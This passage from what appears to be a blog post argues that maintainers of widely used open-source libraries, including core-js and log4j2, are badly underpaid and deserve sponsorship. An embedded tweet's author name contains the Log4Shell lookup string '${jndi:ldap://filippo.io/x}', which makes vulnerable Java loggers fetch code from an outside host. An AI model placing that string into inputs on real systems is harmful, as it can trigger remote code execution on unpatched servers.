is a JavaScript library that gives JavaScript's standard library a lot of core
primitives that can make you not need to reach out to other libraries. This
library is also infamous for letting you know that the author is looking for a
job every time you install it in CI. You probably have seen this message in your
CI a thousand times:
```
Thank you for using core-js ( https://github.com/zloirock/core-js ) for
polyfilling JavaScript standard library!
The project needs your help! Please consider supporting of core-js on Open
Collective or Patreon:
> https://opencollective.com/core-js
> https://www.patreon.com/zloirock
Also, the author of core-js ( https://github.com/zloirock ) is looking for a
good job :-)
```
The author of the project is either still in prison for vehicular manslaughter
or has just been released. `core-js` is a dependency of React. How many of you
have actually donated to this project? Especially if you use React?
Now let's turn our eyes to `log4j2`. This project is effectively in the standard
library for Java users. This library is so ingrained into modern Java that
you'd expect the developers of it would be well-funded and not need to focus on
anything else but that library, right?
No.
<center><blockquoteclass="twitter-tweet"><plang="en"dir="ltr">This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.<br><br>"I work on Log4j in my spare time"<br>"always dreamed of working on open source full time"<br>"3 sponsors are funding <ahref="https://twitter.com/rgoers?ref_src=twsrc%5Etfw">@rgoers</a>'s work: Michael, Glenn, Matt"<br><br>People, what are we doing. <ahref="https://t.co/2hAxUWCjuC">pic.twitter.com/2hAxUWCjuC</a></p>— Filippo ${jndi:ldap://filippo.io/x} Valsorda (@FiloSottile) <ahref="https://twitter.com/FiloSottile/status/1469441487175880711?ref_src=twsrc%5Etfw">December 10, 2021</a></blockquote><scriptasyncsrc="https://platform.twitter.com/widgets.js"charset="utf-8"></script></center>
As of yesterday, there were a grand total of three sponsors for this person's
work. THREE. As of today, this number is now 14; however this is no excuse. This
person should be funded in a level that is appropriate for how critical `log4j2`
is used in the ecosystem. There is no excuse for this. This person's _spare time
passion project_ is responsible for half of the internet working the way it
should. Vulnerable companies to this issue included Apple, Google, my cell phone
carrier and basically everyone that uses JavaEE in its default configuration.
[Seriously, I could trigger some part of my cell carrier's infra reaching
out to a DNS server with a specially crafted SMS
message.](conversation://Cadey/facepalm)
If `log4j2` is responsible for your company's success, you have a moral
obligation to [donate to the person who creates this library
thanklessly](https://github.com/sponsors/rgoers).
[As for the problem that created this vulnerability in the first place: what
where they THINKING when they allowed user-submitted untrusted strings to
contain JDNI references that would then cause the JVM to load arbitrary bytecode
into ram and then run it without having to specify that in the format string to
begin with? Like why would you even need to do that in the _user-supplied_ part
of the format string? What would this even accomplish other than being a great
way to get a shell whenever you wanted?](conversation://Numa/stare)
There is a friend of mine who has been thanklessly maintaining an online radio
station stack for a long time. He has been abused by his users. Users will throw
5 bucks in the tip jar and then get very angry when he doesn't drop everything
and fix their incredibly specific problems on a moment's notice. He has tried to
get jobs at places, but every time they keep trying to screw him out of
ownership of his own projects and he has to turn them down. Meanwhile the cash
bleed continues.
This is why I am very careful about how I make "useful" software and release it
to the world without any solid way for me to get paid for my efforts. I simply
do not want to be in a situation where my software that I develop as a passion
project on the side is holding people's companies together. That's why I make
software how and where I do. Like, no offense, but I really do not want to go
unpaid for my efforts. The existing leech culture of "Open Source" being a pool
of free labor makes it hard for me to want to have my side projects be actually
useful like that unless you pay me.
[Okay, part of this may also be an ADHD thing and not really being able to stick
to projects longer term.](conversation://Cadey/coffee)
TL;DR: If you want me to make you useful software, pay me. If you use software
made by others in their spare time and find it useful, pay them. This should not
be a controversial opinion. This should not be a new thing. This should already
be the state of the world and it is amazingly horrible for us to have the people
that make the things that make our software work at all starve and beg for